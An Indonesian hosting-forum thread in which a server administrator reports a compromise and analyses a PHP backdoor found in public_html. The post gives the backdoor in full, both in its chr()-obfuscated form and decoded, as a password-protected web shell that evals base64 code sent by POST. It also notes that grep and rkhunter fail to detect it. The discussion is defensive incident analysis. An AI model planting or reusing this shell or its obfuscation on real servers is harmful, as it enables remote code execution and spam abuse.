Ketemu backdoor baru

Discussion in 'Masalah Teknik dan Keamanan' started by Abang Noob, 8 Feb 2016.

Thread Status:
Not open for further replies.
  1. Abang Noob

    Abang Noob Poster 2.0

    Messages:
    161
    Likes Received:
    22
    Trophy Points:
    18
    Halo semua, mungkin ini sudah lama. cuma kalo saya pribadi baru kali ini mendapati backdoor seperti ini.

    Jadi pagi tadi dapet notifikasi dari mxtoolbox bahwa ip saya kena blacklist (cuma 1 tools yang memblacklist "Protected Sky").

    dari notifikasi tsb saya jadi mencek email yang keluar dari server. saya mendapati sebuah akun yang mengirimkan > 170 email/jam, untungnya di server saya sudah set hanya bisa mengirimkan 25 email/jam lebih dari itu email otomatis didrop.

    lalu saya mendapati file .php yg mencurigakan di folder public_html, isinya:
    Code:
    <?php                                                                                                                                                                                                                                                                                                                         $z272Cg5=chr(112).chr(114)."e".chr(103)."_repl".chr(97)."c".chr(101);$s4U3o6c="e".chr(118)."al(ba".chr(115).chr(101)."64_d".chr(101).chr(99)."ode("QGV".chr(121).chr(99)."m".chr(57).chr(121).chr(88)."3JlcG9ydGluZy".chr(103)."wK".chr(84).chr(115)."NC".chr(107).chr(66)."pbml".chr(102)."c2".chr(86).chr(48)."KCJka".chr(88)."NwbGF5X2Vyc".chr(109)."9".chr(121)."c".chr(121)."I".chr(115)."M".chr(67)."k7DQpA".chr(97).chr(87).chr(53)."pX".chr(51)."NldCgibG9n".chr(88).chr(50)."V".chr(121).chr(99)."m".chr(57)."ycy".chr(73).chr(115)."MCk".chr(55).chr(68)."Qp".chr(65)."a".chr(87)."5p".chr(88)."3".chr(78)."ldCgiZX".chr(74).chr(121).chr(98)."3".chr(74).chr(102)."bG9".chr(110).chr(73)."i".chr(119).chr(119)."KTsNCg0".chr(75).chr(97)."WY".chr(103)."KGl".chr(122)."c".chr(50).chr(86)."0K".chr(67)."RfUE".chr(57)."TVC".chr(107)."g".chr(74).chr(105).chr(89)."gaXNfYXJ".chr(121)."YX".chr(107)."o".chr(74)."F9".chr(81)."T1".chr(78)."U".chr(75).chr(83)."AmJiBjb3VudC".chr(103)."kX1BPU".chr(49)."QpPjE".chr(112).chr(68)."Q".chr(112)."7DQo".chr(74)."Zm9yZWFjaCAoJ".chr(70).chr(57).chr(81)."T1NUI".chr(71)."F".chr(122).chr(73).chr(67)."R".chr(50).chr(89)."XI".chr(112)."DQoJew".chr(48)."KCQ".chr(108).chr(112)."ZiA".chr(111)."I".chr(87)."lzc2V0KCRjb2RlKSkgJGN".chr(118)."ZGUgPSA".chr(107)."dmF".chr(121)."Ow".chr(48)."KCQllbH".chr(78).chr(108).chr(97)."WYg".chr(75).chr(67)."Fpc3NldCgkcGFz".chr(99)."ykpI".chr(67)."R".chr(119)."Y".chr(88)."NzID0g".chr(74).chr(72)."Z".chr(104)."c".chr(106).chr(115)."N".chr(67)."gk".chr(74)."Z".chr(87)."x".chr(122)."ZSBicmVh".chr(97)."zsNC".chr(103).chr(108)."9DQ".chr(111)."NCgl".chr(112)."ZiAoJHBhc3M".chr(103)."P".chr(84)."0gIl".chr(81)."1".chr(83)."0p".chr(79).chr(100).chr(107)."N".chr(70)."cThS".chr(77).chr(72)."B3d".chr(107)."MzYz".chr(70)."X".chr(86)."GVZ".chr(97)."3B1R".chr(109)."dQW".chr(84)."N2".chr(73).chr(105)."kNC".chr(103).chr(108)."7".chr(68).chr(81)."oJ".chr(67)."WV".chr(50)."YWw".chr(111).chr(89)."mFzZT".chr(89)."0".chr(88).chr(50)."RlY".chr(50).chr(57).chr(107)."ZSgkY".chr(50).chr(57)."kZSkp".chr(79).chr(119)."0KC".chr(88)."0".chr(78).chr(67)."n".chr(48).chr(78).chr(67)."m".chr(86)."4a".chr(88).chr(81)."7")".chr(41).";";$g66kwdn="/91e".chr(54)."5c53".chr(56)."9d29b6b".chr(101)."ec20e179f".chr(98)."8bf4".chr(101)."/e";$z272Cg5($g66kwdn,$s4U3o6c,chr(57).chr(49).chr(101).chr(54)."5c53".chr(56)."9d".chr(50).chr(57)."b6".chr(98).chr(101)."ec".chr(50)."0e".chr(49).chr(55)."9".chr(102).chr(98).chr(56)."bf4".chr(101));?>
    
    saat saya decrypt base64 ternyata tidak bisa, akhirnya saya coba buat script untuk mengubah fungsi chr() ke nilai yg sesuai, sehingga mendapati:

    Code:
    <?php                                                                                                                                                                                                                                                                                                                         $z272Cg5=preg_replace;$s4U3o6c=eval(base64_decode(QGVycm9yX3JlcG9ydGluZygwKTsNCkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMCk7DQpAaW5pX3NldCgibG9nX2Vycm9ycyIsMCk7DQpAaW5pX3NldCgiZXJyb3JfbG9nIiwwKTsNCg0KaWYgKGlzc2V0KCRfUE9TVCkgJiYgaXNfYXJyYXkoJF9QT1NUKSAmJiBjb3VudCgkX1BPU1QpPjEpDQp7DQoJZm9yZWFjaCAoJF9QT1NUIGFzICR2YXIpDQoJew0KCQlpZiAoIWlzc2V0KCRjb2RlKSkgJGNvZGUgPSAkdmFyOw0KCQllbHNlaWYgKCFpc3NldCgkcGFzcykpICRwYXNzID0gJHZhcjsNCgkJZWxzZSBicmVhazsNCgl9DQoNCglpZiAoJHBhc3MgPT0gIlQ1S0pOdkNFcThSMHB3dkMzYzFXVGVZa3B1RmdQWTN2IikNCgl7DQoJCWV2YWwoYmFzZTY0X2RlY29kZSgkY29kZSkpOw0KCX0NCn0NCmV4aXQ7));;$g66kwdn=/91e65c5389d29b6beec20e179fb8bf4e/e;$z272Cg5($g66kwdn,$s4U3o6c,91e65c5389d29b6beec20e179fb8bf4e);?>
    
    saat saya decypt via https://www.tools4noobs.com/online_php_functions/base64_decode/
    jadinya seperti ini:

    Code:
    ÿúaÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿóÛ½‚ƒÿÿÿêeÿÿÿþÎގœëÚÿöÚ±î¸ýלÿÿÿ@error_reporting(0);
    @ini_set("display_errors",0);
    @ini_set("log_errors",0);
    @ini_set("error_log",0);
    
    if (isset($_POST) && is_array($_POST) && count($_POST)>1)
    {
        foreach ($_POST as $var)
        {
            if (!isset($code)) $code = $var;
            elseif (!isset($pass)) $pass = $var;
            else break;
        }
    
        if ($pass == "T5KJNvCEq8R0pwvC3c1WTeYkpuFgPY3v")
        {
            eval(base64_decode($code));
        }
    }
    exit;ÿÿÿþº“gÿu{®\ç=wo[鷞sm׿_oÆßáïÞÿüöï` ÿÿàë©0ÿÿÿ³…7ÿÿÿ÷WºåÎwó×võ¾›yç6Ñí{õöümþÿÿÿ
    
    mungkin ada teman-teman yg bisa mengartikan atau punya metode lain agar bisa mengetahui apa tujuan file .php tsb.

    yang jelas dengan penyerang membuat memakai chr(), maka cara scan memakai:
    grep -r "base64_decode" tidak akan bisa mendapati berkas yang mencurigakan di server. saya juga sudah coba rkhunter ternyata tetap tidak bisa mendeteksi.

    sekian share dari saya, monggo silakan berdiskusi dan memberikan masukan untuk kemajuan kita bersama.
     
  2. junior riau

    junior riau Hosting Guru Web Hosting

    Messages:
    3,227
    Likes Received:
    514
    Trophy Points:
    113
    oh ini :24: udah banyak berkeliaran di server saya, udah banyak pula korban suspend si malware detect :71:
    biasa buat spam itu
     
  3. rendy

    rendy Hosting Guru DWH Guardian Web Hosting (Company)

    Messages:
    2,792
    Likes Received:
    240
    Trophy Points:
    63
    dari sini masih ada yang bilang base64 aman dan ga suka dipake buat iseng begini? ouch
     
    pedagang likes this.
  4. junior riau

    junior riau Hosting Guru Web Hosting

    Messages:
    3,227
    Likes Received:
    514
    Trophy Points:
    113
    base64 nya emang aman kok om, yang gak aman isi dari base64 yang gunakan :24:
     
  5. Mylo Sepz

    Mylo Sepz Apprentice 2.0

    Messages:
    532
    Likes Received:
    59
    Trophy Points:
    28
    itu caranya dia post base64. nanti di decode terus di eksekusi deh
     
Loading...
Thread Status:
Not open for further replies.

Share This Page

Loading...